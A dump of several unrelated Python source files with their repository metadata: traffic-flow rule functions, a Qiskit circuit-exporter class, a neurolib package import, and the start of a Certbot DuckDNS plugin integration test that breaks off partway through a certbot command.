            day.weekday > 4):
        return 0
    return core_param * reg1.population * reg2.service_density * dist_factor(reg1, reg2) * rain_factor(period)


def rule6(reg1, reg2, day, period, core_param):
    if (period.number != 2 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.service_density * reg2.population * dist_factor(reg1, reg2) * rain_factor(period)


def rule7(reg1, reg2, day, period, core_param):
    if (period.number != 1 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.population * reg2.fun_density * dist_factor(reg1, reg2) * rain_factor(period)


def rule8(reg1, reg2, day, period, core_param):
    if (period.number != 2 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.fun_density * reg2.population * dist_factor(reg1, reg2) * rain_factor(period)
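A minimal sketch of how these rule functions might be driven, using simple namedtuple stand-ins for the region/day/period objects. The field sets below are assumptions inferred from the attribute accesses in the rules, not part of the original module:

```python
from collections import namedtuple

# Hypothetical stand-ins mirroring the attributes the rules access.
Region = namedtuple("Region", "name coordinates population job_density service_density fun_density")
Day = namedtuple("Day", "weekday")
Period = namedtuple("Period", "number rain")


def rain_factor(period):
    # Same logic as the module's rain_factor.
    return 1.2 if period.rain else 1


def rule1(reg1, reg2, day, period, core_param):
    # Morning weekday trips from a residential region to a job-dense region.
    if period.number != 0 or reg1.name == reg2.name or day.weekday > 4:
        return 0
    return core_param * reg1.population * reg2.job_density * rain_factor(period)


home = Region("A", (0, 0), population=1000, job_density=0.1,
              service_density=0.2, fun_density=0.3)
work = Region("B", (3, 4), population=500, job_density=0.8,
              service_density=0.1, fun_density=0.2)

# A rainy Monday-morning commute: the rule fires.
flow = rule1(home, work, Day(weekday=0), Period(number=0, rain=True), core_param=0.01)
# 0.01 * 1000 * 0.8 * 1.2 = 9.6
```

Trips within one region or on weekends (weekday > 4) yield 0 by construction.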
| 32.513889 | 110 | 0.644596 | 342 | 2,341 | 4.295322 | 0.134503 | 0.098026 | 0.098026 | 0.09258 | 0.797141 | 0.797141 | 0.797141 | 0.797141 | 0.797141 | 0.767189 | 0 | 0.057963 | 0.240923 | 2,341 | 71 | 111 | 32.971831 | 0.768711 | 0.008543 | 0 | 0.610169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169492 | false | 0 | 0.016949 | 0 | 0.508475 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
b92a8a372f721fda51e597257b00737876aaa56d | 22,073 | py | Python | uranium_quantum/circuit_exporter/qiskit-exporter.py | radumarg/uranium_quantum | e9e62046a2b2e2f31bcab661d48d4bd721ca111a | [
"MIT"
] | null | null | null | uranium_quantum/circuit_exporter/qiskit-exporter.py | radumarg/uranium_quantum | e9e62046a2b2e2f31bcab661d48d4bd721ca111a | [
"MIT"
] | null | null | null | uranium_quantum/circuit_exporter/qiskit-exporter.py | radumarg/uranium_quantum | e9e62046a2b2e2f31bcab661d48d4bd721ca111a | [
"MIT"
] | null | null | null | import importlib
import math
BaseExporter = importlib.import_module("uranium_quantum.circuit_exporter.base-exporter")
class Exporter(BaseExporter.BaseExporter):
def start_code(self):
return f"\
import numpy as np\n\
from qiskit import QuantumRegister\n\
from qiskit.circuit import ClassicalRegister\n\
from qiskit import QuantumCircuit, execute, Aer\n\
from qiskit.circuit.library.standard_gates import iswap\n\
from qiskit.circuit.library import RXXGate, RYYGate, RZZGate\n\
from qiskit.quantum_info.operators import Operator\n\
from qiskit.visualization import plot_histogram\n\
cr = ClassicalRegister({self._bits})\n\
qr = QuantumRegister({self._qubits})\n\
qc = QuantumCircuit(qr, cr)\n\n"
def end_code(self):
return f"\
# Using Aer's qasm_simulator\n\
simulator = Aer.get_backend('qasm_simulator')\n\n\
# Execute the circuit on the qasm simulator\n\
job = execute(qc, backend=simulator, shots=1000)\n\n\
# Grab results from the job\n\
result = job.result()\n\n\
print('Job result status', result.status)\n\
counts = result.get_counts(qc)\n\n\
# Note: you need to include some measure gates in your circuit in order to see some plots here:\n\
plot_histogram(counts)\n"
@staticmethod
def _gate_u3(
target, theta_radians, phi_radians, lambda_radians, add_comments=True
):
out = "# u3 gate\n" if add_comments else ""
out += f"qc.u({theta_radians}, {phi_radians}, {lambda_radians}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_u2(target, phi_radians, lambda_radians, add_comments=True):
out = "# u2 gate\n" if add_comments else ""
out += f"qc.u({math.pi/2}, {phi_radians}, {lambda_radians}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_u1(target, lambda_radians, add_comments=True):
out = "# u1 gate\n" if add_comments else ""
out += f"qc.p({lambda_radians}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_identity(target, add_comments=True):
out = "# identity gate\n" if add_comments else ""
out += f"qc.id(qr[{target}])\n\n"
return out
@staticmethod
def _gate_hadamard(target, add_comments=True):
out = "# hadamard gate\n" if add_comments else ""
out += f"qc.h(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_x(target, add_comments=True):
out = "# pauli-x gate\n" if add_comments else ""
out += f"qc.x(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_y(target, add_comments=True):
out = "# pauli-y gate\n" if add_comments else ""
out += f"qc.y(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_z(target, add_comments=True):
out = "# pauli-z gate\n" if add_comments else ""
out += f"qc.z(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_x_root(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-x-root gate\n" if add_comments else ""
out += f"pauli_x_root = np.exp(1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), -1j * np.sin(np.pi/(2*{root}))],\n\
[-1j * np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_x_root, [{target}], label='pauli-x-root')\n\n"
return out
@staticmethod
def _gate_pauli_y_root(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-y-root gate\n" if add_comments else ""
out += f"pauli_y_root = np.exp(1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), -np.sin(np.pi/(2*{root}))],\n\
[np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_y_root, [{target}], label='pauli-y-root')\n\n"
return out
@staticmethod
def _gate_pauli_z_root(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-z-root gate\n" if add_comments else ""
out += f"pauli_z_root = np.exp(1j * np.pi/{root}) * Operator([\n\
[1, 0],\n\
[0, np.exp(1j * np.pi/{root})],\n\
])\n\n"
out += f"qc.unitary(pauli_z_root, [{target}], label='pauli-z-root')\n\n"
return out
@staticmethod
def _gate_pauli_x_root_dagger(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-x-root-dagger gate\n" if add_comments else ""
out += f"pauli_x_root_dagger = np.exp(-1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), 1j * np.sin(np.pi/(2*{root}))],\n\
[1j * np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_x_root_dagger, [{target}], label='pauli-x-root-dagger')\n\n"
return out
@staticmethod
def _gate_pauli_y_root_dagger(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-y-root-dagger gate\n" if add_comments else ""
out += f"pauli_y_root_dagger = np.exp(-1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), - np.sin(np.pi/(2*{root}))],\n\
[np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_y_root_dagger, [{target}], label='pauli-y-root-dagger')\n\n"
return out
@staticmethod
def _gate_pauli_z_root_dagger(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli_z-root-dagger gate\n" if add_comments else ""
out += f"pauli_z_root_dagger = Operator([\n\
[1, 0],\n\
[0, np.exp(-1j * np.pi/{root})],\n\
])\n\n"
out += f"qc.unitary(pauli_z_root_dagger, [{target}], label='pauli-z-root-dagger')\n\n"
return out
@staticmethod
def _gate_sqrt_not(target, add_comments=True):
out = "# sqrt-not gate\n" if add_comments else ""
out += f"qc.sx(qr[{target}])\n\n"
return out
@staticmethod
def _gate_t(target, add_comments=True):
out = "# t gate\n" if add_comments else ""
out += f"qc.t(qr[{target}])\n\n"
return out
@staticmethod
def _gate_t_dagger(target, add_comments=True):
out = "# t-dagger gate\n" if add_comments else ""
out += f"qc.tdg(qr[{target}])\n\n"
return out
@staticmethod
def _gate_rx_theta(target, theta, add_comments=True):
out = "# rx-theta gate\n" if add_comments else ""
out += f"qc.rx({theta}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_ry_theta(target, theta, add_comments=True):
out = "# ry-theta gate\n" if add_comments else ""
out += f"qc.ry({theta}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_rz_theta(target, theta, add_comments=True):
out = "# rz-theta gate\n" if add_comments else ""
out += f"qc.rz({theta}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_s(target, add_comments=True):
out = "# s gate\n" if add_comments else ""
out += f"qc.s(qr[{target}])\n\n"
return out
@staticmethod
def _gate_s_dagger(target, add_comments=True):
out = "# s-dagger gate\n" if add_comments else ""
out += f"qc.sdg(qr[{target}])\n\n"
return out
@staticmethod
def _gate_swap(target, target2, add_comments=True):
out = "# swap gate\n" if add_comments else ""
out += f"qc.swap(qr[{target}], qr[{target2}])\n\n"
return out
@staticmethod
def _gate_iswap(target, target2, add_comments=True):
out = "# iswap gate\n" if add_comments else ""
out += f"qc.iswap(qr[{target}], qr[{target2}])\n\n"
return out
@staticmethod
def _gate_swap_phi(target, target2, phi, add_comments=True):
out = "# swap-phi gate\n" if add_comments else ""
out += f"swap_phi = Operator([\n\
[1, 0, 0, 0],\n\
[0, 0, np.exp(1j * {phi}), 0],\n\
[0, np.exp(1j * {phi}), 0, 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(swap_phi, [{target}, {target2}], label='swap-phi')\n\n"
return out
@staticmethod
def _gate_sqrt_swap(target, target2, add_comments=True):
out = "# sqrt-swap gate\n" if add_comments else ""
out += f"qc.u({math.pi/2}, {math.pi/2}, {-math.pi}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, {-math.pi/2}, {math.pi}, qr[{target2}])\n"
out += f"qc.cx(qr[{target}], qr[{target2}])\n"
out += f"qc.u({math.pi/4}, {-math.pi/2}, {-math.pi/2}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, 0, {1.75 * math.pi}, qr[{target2}])\n"
out += f"qc.cx(qr[{target}], qr[{target2}])\n"
out += f"qc.u({math.pi/4}, {-math.pi}, {-math.pi/2}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, {math.pi}, {math.pi/2}, qr[{target2}])\n"
out += f"qc.cx(qr[{target}], qr[{target2}])\n"
out += f"qc.u({math.pi/2}, 0, {-1.5 * math.pi}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, {math.pi/2}, 0, qr[{target2}])\n\n"
return out
@staticmethod
def _gate_xx(target, target2, theta, add_comments=True):
out = "# xx gate\n" if add_comments else ""
out += f"qc.append(RXXGate({theta}), [{target}, {target2}])\n\n"
return out
@staticmethod
def _gate_yy(target, target2, theta, add_comments=True):
out = "# yy gate\n" if add_comments else ""
out += f"qc.append(RYYGate({theta}), [{target}, {target2}])\n\n"
return out
@staticmethod
def _gate_zz(target, target2, theta, add_comments=True):
out = "# zz gate\n" if add_comments else ""
out += f"qc.append(RZZGate({theta}), [{target}, {target2}])\n\n"
return out
@staticmethod
def _gate_ctrl_hadamard(control, target, controlstate, add_comments=True):
out = "# ctrl-hadamard gate\n" if add_comments else ""
out += f"qc.ch(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_u3(
control,
target,
controlstate,
theta_radians,
phi_radians,
lambda_radians,
add_comments=True,
):
out = "# ctrl-u3 gate\n" if add_comments else ""
out += f"qc.cu({theta_radians}, {phi_radians}, {lambda_radians}, {math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_u2(
control, target, controlstate, phi_radians, lambda_radians, add_comments=True
):
out = "# ctrl-u2 gate\n" if add_comments else ""
out += f"qc.cu({math.pi/2}, {phi_radians}, {lambda_radians}, {math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_u1(
control, target, controlstate, lambda_radians, add_comments=True
):
out = "# ctrl-u1 gate\n" if add_comments else ""
out += f"qc.cp({lambda_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_t(control, target, controlstate, add_comments=True):
out = "# ctrl-t gate\n" if add_comments else ""
out += f"qc.cp({math.pi/4}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_t_dagger(control, target, controlstate, add_comments=True):
out = "# ctrl-t-dagger gate\n" if add_comments else ""
out += f"qc.cp({-math.pi/4}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_x(control, target, controlstate, add_comments=True):
out = "# ctrl-pauli-x gate\n" if add_comments else ""
out += f"qc.cx(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_y(control, target, controlstate, add_comments=True):
out = "# ctrl-pauli-y gate\n" if add_comments else ""
out += f"qc.cy(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_z(control, target, controlstate, add_comments=True):
out = "# ctrl-pauli-z gate\n" if add_comments else ""
out += f"qc.cz(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_x_root(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-x-root gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_x_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, -1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, -1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_x_root = Operator([\n\
[np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, -1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[-1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_x_root, [{control}, {target}], label='ctrl-pauli-x-root')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_y_root(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-y-root gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_y_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, - np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_y_root = Operator([\n\
[np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, - np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_y_root, [{control}, {target}], label='ctrl-pauli-y-root')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_z_root(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-z-root gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_z_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, 1, 0],\n\
[0, 0, 0, np.exp(1j * np.pi/{root})],\n\
])\n"
else:
out += f"ctrl_pauli_z_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, np.exp(1j * np.pi/{root}), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_z_root, [{control}, {target}], label='ctrl-pauli-z-root')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_x_root_dagger(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-x-root-dagger gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_x_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, 1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, 1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_x_root_dagger = Operator([\n\
[np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, 1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_x_root_dagger, [{control}, {target}], label='ctrl-pauli-x-root-dagger')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_y_root_dagger(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-y-root-dagger gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_y_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_y_root_dagger = Operator([\n\
[np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_y_root_dagger, [{control}, {target}], label='ctrl-pauli-y-root-dagger')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_z_root_dagger(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-z-root-dagger gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_z_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, 1, 0],\n\
[0, 0, 0, np.exp(-1j * np.pi/{root})],\n\
])\n"
else:
out += f"ctrl_pauli_z_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, np.exp(-1j * np.pi/{root}), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_z_root_dagger, [{control}, {target}], label='ctrl-pauli-z-root-dagger')\n\n"
return out
@staticmethod
def _gate_ctrl_sqrt_not(control, target, controlstate, add_comments=True):
out = "# ctrl-sqrt-not gate\n" if add_comments else ""
out += f"qc.csx(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_rx_theta(
control, target, controlstate, theta_radians, add_comments=True
):
out = "# ctrl-rx-theta gate\n" if add_comments else ""
out += f"qc.crx({theta_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_ry_theta(
control, target, controlstate, theta_radians, add_comments=True
):
out = "# ctrl-ry-theta gate\n" if add_comments else ""
out += f"qc.cry({theta_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_rz_theta(
control, target, controlstate, theta_radians, add_comments=True
):
out = "# ctrl-rz-theta gate\n" if add_comments else ""
out += f"qc.crz({theta_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_s(control, target, controlstate, add_comments=True):
out = "# ctrl-s gate\n" if add_comments else ""
out += f"qc.cp({math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_s_dagger(control, target, controlstate, add_comments=True):
out = "# ctrl-s-dagger gate\n" if add_comments else ""
out += f"qc.cp({-math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_toffoli(
control, control2, target, controlstate, controlstate2, add_comments=True
):
#controlstate = f"{controlstate}{controlstate2}"
if (int(controlstate) != 1 or int(controlstate2) != 1):
raise BaseExporter.ExportException("Due to a bug in the current version of Qiskit, the Toffoli gate supports only 1 as the control state.")
out = "# toffoli gate\n" if add_comments else ""
out += f"qc.ccx(qr[{control}], qr[{control2}], qr[{target}])\n\n"
return out
@staticmethod
def _gate_fredkin(control, target, target2, controlstate, add_comments=True):
out = "# fredkin gate\n" if add_comments else ""
out += f"qc.cswap(qr[{control}], qr[{target}], qr[{target2}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_measure_x(target, classic_bit, add_comments=True):
raise BaseExporter.ExportException("The measure-x gate is not implemented.")
@staticmethod
def _gate_measure_y(target, classic_bit, add_comments=True):
raise BaseExporter.ExportException("The measure-y gate is not implemented.")
@staticmethod
def _gate_measure_z(target, classic_bit, add_comments=True):
out = "# measure-z gate\n" if add_comments else ""
out += f"qc.measure(qr[{target}], cr[{classic_bit}])\n\n"
return out
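The matrix algebra behind gates such as `_gate_pauli_x_root` can be checked independently of Qiskit. The sketch below rebuilds the same 2×2 operator with plain numpy and verifies that for root = 2 it is unitary and squares to Pauli-X:

```python
import numpy as np


def pauli_x_root_matrix(root):
    # The same matrix the exporter emits for the pauli-x-root gate,
    # as a plain numpy array instead of a qiskit Operator.
    phase = np.exp(1j * np.pi / (2 * root))
    c = np.cos(np.pi / (2 * root))
    s = np.sin(np.pi / (2 * root))
    return phase * np.array([[c, -1j * s], [-1j * s, c]])


X = np.array([[0, 1], [1, 0]], dtype=complex)
M = pauli_x_root_matrix(2)  # square root of X

assert np.allclose(M.conj().T @ M, np.eye(2))  # unitary
assert np.allclose(M @ M, X)                   # (X^(1/2))^2 == X
```

The global phase factor `exp(i*pi/(2*root))` is what makes the controlled variants above differ from a bare rotation.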
| 41.412758 | 146 | 0.576995 | 3,469 | 22,073 | 3.54079 | 0.049005 | 0.096719 | 0.034194 | 0.061548 | 0.871855 | 0.848327 | 0.820891 | 0.782789 | 0.75576 | 0.699178 | 0 | 0.025454 | 0.223984 | 22,073 | 532 | 147 | 41.490602 | 0.691634 | 0.002129 | 0 | 0.480932 | 0 | 0.133475 | 0.234824 | 0.089398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.120763 | false | 0 | 0.023305 | 0.004237 | 0.262712 | 0.002119 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b92a97b1261d605546ecced5a1461f1819ffdb7d | 28 | py | Python | neurolib/models/awc/__init__.py | ChristophMetzner/neurolib | 912da81fc9dd3a348684ba695f0f4b739e596bad | [
"MIT"
] | 1 | 2021-07-05T10:55:14.000Z | 2021-07-05T10:55:14.000Z | neurolib/models/awc/__init__.py | ChristophMetzner/neurolib | 912da81fc9dd3a348684ba695f0f4b739e596bad | [
"MIT"
] | null | null | null | neurolib/models/awc/__init__.py | ChristophMetzner/neurolib | 912da81fc9dd3a348684ba695f0f4b739e596bad | [
"MIT"
] | null | null | null | from .model import AWCModel
| 14 | 27 | 0.821429 | 4 | 28 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b94e8b42f4a3901be1deeede1750a768acf29058 | 5,451 | py | Python | tests/cert_test.py | durnezj/certbot_dns_duckdns | 34822ec5838af9886b433fa33d85b3fe191836fc | [
"MIT"
] | null | null | null | tests/cert_test.py | durnezj/certbot_dns_duckdns | 34822ec5838af9886b433fa33d85b3fe191836fc | [
"MIT"
] | null | null | null | tests/cert_test.py | durnezj/certbot_dns_duckdns | 34822ec5838af9886b433fa33d85b3fe191836fc | [
"MIT"
] | null | null | null | """
ATTENTION:
These tests are not meant for the normal test case,
as this tries to test the integration to the Certbot by using
a subprocess call and installing this package globally.
You should not run this test unless you know exactly what you are doing.
"""
import os
import subprocess
import os
import subprocess
import unittest

from certbot.errors import PluginError
from cert.client import Authenticator

DOMAIN = os.environ.get("TEST_DOMAIN")
DUCKDNS_TOKEN = os.environ.get("TEST_DUCKDNS_TOKEN")


class CertbotPluginTests(unittest.TestCase):

    def test_invalid_token(self):
        assert DOMAIN is not None and len(DOMAIN) > 0
        assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0

        class TestConfig(object):
            test42_token = "securetoken42"

        auth = Authenticator(config=TestConfig(), name="test42")
        with self.assertRaises(PluginError):
            auth._perform(domain=DOMAIN, validation_name="test=42", validation="42")

    def test_empty_token(self):
        assert DOMAIN is not None and len(DOMAIN) > 0
        assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0

        class TestConfig(object):
            test42_token = ""

        auth = Authenticator(config=TestConfig(), name="test42")
        with self.assertRaises(PluginError):
            auth._perform(domain=DOMAIN, validation_name="test=42", validation="42")

    def test_none_token(self):
        assert DOMAIN is not None and len(DOMAIN) > 0
        assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0

        class TestConfig(object):
            test42_token = None

        auth = Authenticator(config=TestConfig(), name="test42")
        with self.assertRaises(PluginError):
            auth._perform(domain=DOMAIN, validation_name="test=42", validation="42")

    def test_invalid_domain(self):
        assert DOMAIN is not None and len(DOMAIN) > 0
        assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0

        class TestConfig(object):
            test42_token = DUCKDNS_TOKEN

        auth = Authenticator(config=TestConfig(), name="test42")
        with self.assertRaises(PluginError):
            auth._perform(domain="thisdomainsisnotvalid", validation_name="test=42", validation="42")

    def test_certificate(self):
        assert DOMAIN is not None and len(DOMAIN) > 0
        assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0

        # check if certbot is installed
        subprocess.check_output(["certbot", "--version"])
        # install certbot_dns_duckdns plugin
        subprocess.check_output(["pip", "install", ".."])
        # check if certbot works properly with the dns plugin
        subprocess.check_output(["certbot",
                                 "certonly",
                                 "--non-interactive",
                                 "--agree-tos",
                                 "--register-unsafely-without-email",
                                 "--authenticator",
                                 "dns-duckdns",
                                 "--dns-duckdns-token",
